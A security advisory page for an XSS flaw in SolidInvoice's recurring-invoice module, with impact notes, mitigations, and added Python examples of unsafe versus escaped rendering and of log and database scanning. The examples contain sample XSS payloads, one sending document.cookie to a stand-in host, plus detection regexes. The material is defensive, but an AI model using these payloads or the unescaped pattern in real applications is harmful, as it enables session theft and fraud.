CVE-2025-9167: Cross Site Scripting in SolidInvoice
A vulnerability has been found in SolidInvoice up to 2.4.0. It affects unknown code in the file /invoice/recurring of the component Recurring Invoice Module. Manipulation of the argument client name leads to cross-site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
AI Analysis
Technical Summary
CVE-2025-9167 is a cross-site scripting (XSS) vulnerability in SolidInvoice versions up to 2.4.0, located in the Recurring Invoice Module at the /invoice/recurring endpoint. The root cause is missing or insufficient output encoding of the client name: a name containing HTML or script is written into the recurring-invoice page as markup rather than as text, so the browser executes attacker-supplied JavaScript in the context of whichever user views the page. The description does not say whether the injection is reflected (payload carried in the request) or stored (payload saved in a client record). Because the client name is a persisted field, the stored form is the more likely shape; in that case the attacker needs the ability to create or edit a client, and the payload fires for every staff user who later opens the recurring invoice list. The attack is remote and needs user interaction (the victim viewing the manipulated page or following a crafted link). The CVSS 4.0 base score reported for the entry is 5.1 (medium), reflecting a network attack vector, low attack complexity and required user interaction; the reading that no privileges are required should be verified against the published vector string, since 5.1 is also the score the CVSS 4.0 calculator gives a low-privilege (authenticated) XSS of this profile, which fits the stored form. Confidentiality and integrity are affected to a limited degree: injected script can read page content, issue requests in the victim's session (for example to change invoice or payment details) and, where the session cookie lacks the HttpOnly flag, exfiltrate the cookie. Availability is not affected. The vendor did not respond to the disclosure and no official patch or mitigation has been released as of publication. No exploitation in the wild has been reported, but public disclosure raises the likelihood of attempts.
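An added example, not code from this page or from the SolidInvoice project, of the rendering mistake the summary describes beside its hardened form. It models a row of the recurring-invoice table in Python: the client records, the row template, the sample payload and the function names are constructed assumptions for illustration only.

```python
import html
import re

# Constructed sample client records (not real SolidInvoice data).
# Record 2 carries an XSS payload; record 3 is a legitimate name that
# still needs encoding because it contains & and quote characters.
CLIENTS = [
    {"id": 1, "name": "Acme GmbH"},
    {"id": 2, "name": '<img src=x onerror="alert(document.cookie)">'},
    {"id": 3, "name": 'O\'Reilly & Sons "Ltd"'},
]

# Assumed shape of one table row in the recurring-invoice list.
ROW_TEMPLATE = "<tr><td>{id}</td><td>{name}</td></tr>"


def render_row_unsafe(client):
    """Models the flaw: the stored client name is interpolated straight
    into the HTML, so any tag in the name becomes live markup."""
    return ROW_TEMPLATE.format(id=client["id"], name=client["name"])


def render_row_safe(client):
    """Hardened form: every untrusted value is HTML-entity encoded for the
    context it lands in (element text here). quote=True also covers the
    double-quoted attribute context, which matters if the same helper is
    reused for attributes."""
    return ROW_TEMPLATE.format(
        id=html.escape(str(client["id"]), quote=True),
        name=html.escape(client["name"], quote=True),
    )


# Matches any HTML tag; used to check whether a rendered row contains
# markup beyond what the template itself emits.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
TEMPLATE_TAGS = {"<tr>", "</tr>", "<td>", "</td>"}


def contains_markup(rendered_row):
    """True if the rendered row contains a tag the template did not emit,
    i.e. the client name has been interpreted as HTML."""
    tags = [t.lower() for t in TAG_RE.findall(rendered_row)]
    return any(t not in TEMPLATE_TAGS for t in tags)


if __name__ == "__main__":
    for client in CLIENTS:
        unsafe = render_row_unsafe(client)
        safe = render_row_safe(client)
        print(f"client {client['id']}: unsafe row injects markup = "
              f"{contains_markup(unsafe)}, safe row injects markup = "
              f"{contains_markup(safe)}")
        print("  unsafe:", unsafe)
        print("  safe:  ", safe)
```

The encoding must match the output context: entity encoding as shown is right for element text and quoted attribute values, but a client name placed inside a JavaScript string or a URL needs the encoding for that context instead, and a template engine with autoescaping gives the safe behaviour only if no raw-output filter is applied to the field.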
Potential Impact
For European organizations using SolidInvoice for invoicing and recurring billing, the risk is moderate. Script injected through a client name runs with the privileges of whoever views the recurring invoice list, typically finance or administrative staff. From there it can read invoice and client data on the page, submit requests in the victim's session to alter invoices or payment details, or display fake prompts inside the trusted billing interface to harvest credentials. Outright session-cookie theft additionally requires that the session cookie lack the HttpOnly flag; with HttpOnly set, the script still acts within the session but cannot export the cookie. Possible consequences are financial fraud, leakage of client and invoice data, and reputational damage, and because the vendor has not responded, the exposure window is open-ended. SMEs that rely on SolidInvoice and hold EU customer data are the most exposed, and a breach involving personal data can trigger GDPR notification and accountability obligations.
Mitigation Recommendations
Because no official patch exists, compensating controls are needed now. The decisive fix is output encoding where the client name is rendered: every occurrence of the name in the recurring-invoice page (and anywhere else it is displayed) must be HTML-entity encoded for its context, which in a template engine with autoescaping means removing any raw-output filter applied to that field. Input validation on the client name is a useful second layer but not a substitute, since legitimate names can contain ampersands, quotes and angle brackets. Audit the existing clients table for names that already contain markup or script, because if the flaw is stored, payloads entered before the fix keep firing until the records are cleaned. A Content Security Policy whose script-src omits 'unsafe-inline' blocks most inline payloads even where encoding is missed, and the session cookie should carry the HttpOnly and SameSite attributes so that a successful injection cannot export it. A Web Application Firewall (WAF) rule for XSS patterns on requests to /invoice/recurring and on the client create/edit endpoints can block probes, but it will not stop a payload submitted through a legitimate authenticated form unless it also inspects request bodies. Restrict the application to trusted IP ranges or a VPN where feasible, and train users to be wary of unexpected invoice links. Monitor web server logs for requests to /invoice/recurring with unusual query parameters and for repeated access from a single source, and monitor the clients table as well, since a stored payload leaves no trace in the query string. Plan to upgrade as soon as the project publishes a release after 2.4.0 that addresses the issue, or to migrate to another invoicing solution, and keep backups and incident response procedures ready in case exploitation occurs.
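An added example, not from this page or from the SolidInvoice project, of the two detection steps recommended above in Python: scanning access-log lines for XSS probes against /invoice/recurring, and scanning an export of the clients table for payloads that are already stored and would never show up in a query string. The log lines, the client export, the indicator pattern and the function names are constructed assumptions; the pattern is deliberately broad because this is a triage filter, not a WAF rule.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Broad indicators of an XSS probe or stored payload: an opening tag,
# an inline event handler, a javascript: URL, or common encodings of '<'.
XSS_INDICATORS = re.compile(
    r"(<\s*/?\s*[a-z]|on[a-z]+\s*=|javascript\s*:|%3c|&lt;|\\u003c)",
    re.IGNORECASE,
)

TARGET_PATH = "/invoice/recurring"

# Constructed combined-format access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [20/Aug/2025:10:01:12 +0000] "GET /invoice/recurring HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Aug/2025:10:01:40 +0000] "GET /invoice/recurring?client=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 8140 "-" "Mozilla/5.0"
198.51.100.2 - - [20/Aug/2025:10:02:03 +0000] "POST /clients/add HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Aug/2025:10:02:30 +0000] "GET /invoice/recurring?client=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 8150 "-" "Mozilla/5.0"
192.0.2.9 - - [20/Aug/2025:10:03:00 +0000] "GET /invoice/recurring?page=2 HTTP/1.1" 200 8111 "-" "Mozilla/5.0"
"""

# Apache/nginx combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_requests(log_text):
    """Return (ip, timestamp, decoded target) for requests to the affected
    endpoint whose query string carries an XSS indicator after URL decoding.
    Decoding first matters: the probes below are percent-encoded on the wire."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != TARGET_PATH:
            continue
        if XSS_INDICATORS.search(unquote_plus(parts.query)):
            hits.append((m["ip"], m["ts"], unquote_plus(m["target"])))
    return hits


def offending_sources(log_text):
    """Count suspicious requests per source IP to spot repeated probing."""
    return Counter(ip for ip, _, _ in suspicious_requests(log_text))


# Constructed export of the clients table, e.g. from a CSV dump (id, name).
CLIENT_EXPORT = [
    (1, "Acme GmbH"),
    (2, "Müller & Söhne"),
    (3, '"><svg onload=fetch("//evil.example/?c="+document.cookie)>'),
    (4, "Clients 'R' Us"),
]


def tainted_client_ids(rows):
    """Return ids of client records whose name already carries markup or
    script indicators: a stored payload waiting to render on the next view."""
    return [cid for cid, name in rows if XSS_INDICATORS.search(name)]


if __name__ == "__main__":
    for ip, ts, target in suspicious_requests(SAMPLE_LOG):
        print(f"probe from {ip} at {ts}: {target}")
    print("sources:", dict(offending_sources(SAMPLE_LOG)))
    print("client records to clean:", tainted_client_ids(CLIENT_EXPORT))
```

Names such as "Müller & Söhne" pass the record scan because an ampersand or a quote is not by itself a tag or handler; anything the scan does flag should be reviewed by hand before the record is corrected, and the log scan is only meaningful for the reflected case, which is why both checks are run.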
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Technical Details
- Data Version: 5.1
- Assigner Short Name: VulDB
- Date Reserved: 2025-08-19T13:36:50.988Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 68a4e2f4ad5a09ad00faec80
Added to database: 8/19/2025, 8:47:48 PM
Last enriched: 8/27/2025, 1:14:34 AM
Last updated: 8/27/2025, 1:14:34 AM
Related Threats
CVE-2025-8663: CWE-532 Insertion of Sensitive Information into Log File in upKeeper Solutions upKeeper Manager (High)
CVE-2025-9378: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in themehunk Vayu Blocks – Website Builder for the Block Editor (Medium)
CVE-2025-58210: CWE-862 Missing Authorization in ThemeMove Makeaholic (Medium)
CVE-2025-21041: CWE-922 Insecure Storage of Sensitive Information in Samsung Mobile Secure Folder (Medium)
CVE-2025-21040: CWE-925 Improper Verification of Intent by Broadcast Receiver in Samsung Mobile S Assistant (Medium)